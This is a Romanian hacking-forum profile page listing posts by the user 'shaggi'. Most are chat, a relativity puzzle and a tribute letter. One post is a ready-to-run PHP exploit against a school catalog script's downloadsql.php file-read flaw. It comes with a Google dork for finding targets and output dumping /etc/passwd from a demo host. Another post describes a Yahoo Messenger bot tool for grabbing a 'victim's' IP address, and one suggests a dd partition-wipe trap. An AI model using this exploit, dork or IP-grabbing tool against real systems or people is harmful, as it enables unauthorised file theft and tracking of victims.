Jump to content

shaggi

Active Members
  • Posts

    825
  • Joined

  • Last visited

  • Days Won

    8

Everything posted by shaggi

  1. http://i.imgur.com/2DHDt.png
  2. artists asa se pare, ce sa le faci, astia sunt hackeri aia de elita din team-uri cu "hack" in nume
  3. ################################################## # Description : Online catalog script - grab the content of any file on the server # Author : shaggi # Contact: contect@shaggi.me # Link : http://demo.catalogscolar.com # Date : January 2, 2013 # Dork : inurl:clase.html intitle:Catalog ################################################## <?php function help(){ echo "Usage: php exploit.php --get-data demo.catalogscolar.com /etc/passwd\n --get-data : Get content of a file on the server\n --get-path : Get the path to the script\n";die();} if(!isset($argv[1]) || !isset($argv[2]) ){help();} switch($argv[1]){ case "--get-path"; $data = file_get_contents("http://$argv[2]/admin/backup/downloadsql.php?file=")."\n"; $data = explode("Filename cannot be empty in <b>",$data); $data = explode("admin/backup/downloadsql.php</b> on line <b>",$data[1]); echo $data[0]; break; case "--get-data"; if(!isset($argv[3])){help();} $data = file_get_contents("http://$argv[2]/admin/backup/downloadsql.php?file=$argv[3]"); echo $data; break; default; help(); } ?> Usage: shaggi@enux:~/Desktop$ php exploit.php --get-data demo.catalogscolar.com /etc/passwd nobody:x:99:99:Nobody:/:/sbin/nologin bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin cpaneleximfilter:x:32007:32009::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell root:x:0:0:root:/root:/bin/bash mysql:x:101:103:MySQL server:/var/lib/mysql:/bin/bash mail:x:8:12:mail:/var/spool/mail:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mailman:x:32006:32006::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash xphpin:x:608:604::/home/xphpin:/usr/local/cpanel/bin/noshell shaggi@enux:~/Desktop$
  4. M-am gandit sa fac un fel de "Who the fuck is?" avand in vedere ca cel de la totti nu mai e functional. Este facut in node.js, codul sursa e putin cam nearanjat si imi cer scuze pentru asta. Am folosit o clasa de conectare la Y!M construita de catre nr913 Cum se foloseste? DEMO ////// daca demo-ul e jos accesati asta http://shaggi.tk/a.php COD SURSA COD SURSA2 aici aveti doua variante: 1. Folositi demo-ul expus. 2. Rulati codul scriptul pe un vps/dedicat sau chiar pe PC. //Explicatii 1.help() Deci avem doua inputuri: - "ID tau" : unde pui ID-ul tau de Y!M pentru ca botul sa-ti trimita ip-ul victimei - "ID victima" : unde pui ID-ul de Y!M al victimei 2.help() - pentru a rula acest script aveti nevoie de un PC cu node.js instalat si cu urmatoarele module node.js ce sunt instalate by default: + http + fs -se editeaza setting.js dupa urmatoarea configuratie: BotClass = require("./YBot.js"); // clasa de conectare la Y!M fs = require("fs");// modulul de accesare a fisierelor http = require("http"); //modulul de creare a serverelor http bots = new Array(); bots.push(["yahooid1", "yahoopasswd"]);//bot 1 bots.push(["yahooid1", "yahoopasswd"]);//bot 2 : se pot adauga cati boti doriti doar prin adaugarea in array-ul bots prin bots.push(["username", "parola"]) port = 1330;//portul de rulare bot = new Array(); hostname = "hostname.com"; // site-ul sau ip-ul public al locului unde hostati scriptul images = fs.readdirSync("Images/"); -se ruleaza in modul consola urmatoarele : "node main.js" - acum accesati scriptul la adresa si pe port-ul setat de dumneavoastra si urmati instructiunile de la 1.help() Utilizare placuta:) // Deci nu am idee care e treaba de nu functioneaza mereu, probabil cei de la yahoo au banat boti, mai bine va faceti un id si il instalati la voi in pc MADE BY RST!
  5. Oare ca zic retarzi astia cand vad a nu se intampla nimic? )))))))))))))))))))))))))
  6. Sper sa citesti asta pana la capat chiar daca esti suparat pe mine:) Chiar am stat ceva timp sa ma gandesc ce sa spun fara sa aiba un inteles ciudat, dar sunt sigur ca o sa intelegi. Cum spunea si colegul meu Cheater mai sus, unii dintre noi ne formam dupa un set de reguli. Regulile acelea nu ne nastem cu ele, ci crestem intr-un mediu care ne invata si formeaza, asta a fost RST pentru mine. Pot spune cu mandrie ca mai tin minte cand iti trimiteam PM-uri cu glume proaste si tu raspundeai, facandu-ma sa ma intreb de ce ar raspunde cineva de varsta si notorietatea ta la asa un mesaj. Mult timp dupa mi-am dat seama ca e vorba de pareri, din 1000 de persoane rar se gasesc cateva care sa aiba ceva comun de discutat si dezbatut, eu nu eram una din acele persoane pentru tine, dar cand iti puneam intrebarii banale pentru tine raspundeai cu placere, pentru ca iti place sa inveti pe oricine si sa-i faci sa inteleaga, si asta apreciez la tine chiar daca nu te cunosc in viata reala. Poate daca n-ai fi fost tu acum ar fi inca cateva persoane care s-ar ocupa cu alte lucruri putin mai neonorabile. Nu prea am multe de spus deoarece nu am stiut niciodata sa-mi aranjez cuvintele intr-o pagina, dar sper ca in urmatoarele randuri sa-mi spun punctul de vedere. Pot spune dupa marimea numarului de "scrisorii" ca esti foarte respectat, deoarece asta faci tu la randul tau, respecti si esti altruist. Pot spune cu adevarat ca urasc profesori, dar tu ai stiut sa te faci inteles in unele cazuri unde era nevoie. Mai pot spune ca mi-as dori cand voi fi mare sa fiu ca tine, nu un tip ce sta intr-un birou si analizeaza logurile sa vada daca au mai patruns pitpalacii prin scriptul lui ghita avand useragent-ul "havij" ci un tip care formeaza persoanele ca si mine, cineva care sa stie ce e bine si rau, cineva care atunci cand spune niste lucruri le spune de la persoana la persoana, netinand cont de varsta sau de "reputatie". Imi esti mentor si mereu vei fi, indiferent prin ce treci eu voi incerca sa te sustin, macar cu niste cuvinte, respect si ganduri bune. Te asteptam pe chat cu povestile tale care ne-au cam lipsit in ultima vreme si cu discutiile anti-tigani:) Cu mult drag si respect shaggi!
  7. sau se pot implementa doua sisteme diferite de encoding, unu la vedere si atunci cand bagi o anumita parola sa-ti stearga toata partitia cu dd, si altul ascuns pe undeva, cum e in yes --encfs, sau ascuns in orice alt executabil si sa fie cel real... Ba, daca va simtiti cu musca pe caciula folositi fratilor TOR...
  8. Oare cati dintre voi si-au dat seama ca numele lui e o nenorocita de anagrama?
  9. shaggi

    Fun stuff

    https://www.facebook.com/photo.php?fbid=443943265659453&set=a.417212008332579.100128.351962688190845&type=1 cititi commurile....
  10. shaggi

    Nu mai avem chat.

    ^ Poate tu te relaxezi si injuri, dar cine vine nou pe forum si cauta ajutor nu mai sta sa faca n topicuri pana ii da cineva ban, vin pe chat si il ajutam noi care suntem online. Pe langa asta acolo se mai discuta si alte subiecte interesante, nu stau acum sa le enumar... Si pe langa toate cele de mai sus, chat-ul reduce offtopicul.
  11. penal:))))
  12. Cred ca tu ar trebui sa fii propus calau. Poate asa o sa poti dormi linistit noaptea, stiind ca omori oameni vinovati care pot face rau altor oameni daca ar fi in libertate. Desigur, voi aveti impresia ca inchisorile nu sunt de ajuns pentru o fiinta umana, atunci incercati-o voi sa vedeti ce e mai rau, moartea sau inchisoarea pe viata.
  13. Nu sunt de acord deoarece mai exista si erori judiciare si inscenari, si sper ca nu ar vrea cineva sa omoare un nevinovat.
  14. 9
  15. deci "problema" tine de legile de compunere a vitezelor, e absurd sa lucrezi cu TRR si sa zici c+(c-1) ca in mecanica clasica, aici legile de compunere au la baza transformarile lorentz. Si ca sa te fac sa intelegi iti spun astfel, timpul in Y s-a dilatat in asa fel incat diferenta respectiva a celor doua viteze a devenit viteza lumini. Poate suna ciudat dar asta e realitatea:)
  16. Updated, daca mai aveti intrebari nu ezitati sa le puneti. PS: nici macar eu nu sunt sigur daca raspunsul care cred eu ca e real e chiar real, aflam cu toti maine:)
  17. timpul se dilata, in functie de viteza de calatorie a lui z Citez din Albert Einstein : "Legile naturi percepute de observator sunt independente de miscarea lui"
  18. Deci avem trei corpuri(aka rachete) x,y,z: X sta pe loc viteza lui Y fata de X este c (3x108) viteza lui Z fata de X este c/2 ((3x108)/2) Intrebare: care este viteza lui Y fata de Z? Problema se pune in felul urmator: in mecanica clasica cu legile de compozitie "clasice" ale vitezei se poate observa ca viteza lui Y fata de Z este c/2 dar noi lucram in TRR si avem nevoie de legile din TRR, deci care este viteza lui Y fata de Z ? PS: cand zic viteza lui Y fata de Z adica sa fie masurata din Z;) PS2: corpurile se misca dealungul a doua axe paralele avand aceiasi directie Solvers: - TheTime - totti93 //updated Challenge closed. Dar puteti invata din el, si daca mai aveti intrebari sunt sigur ca eu sau TheTime vom incerca a va ajuta
  19. asta e comunicarea intre un shell(proces fiu) si un terminal(proces tata). Trebuie neaparat in C/C++ ?
  20. lubuntu (80 mb ram on standby)
  21. Da-mi si mie MP cu testul. Meci mult!
×
×
  • Create New...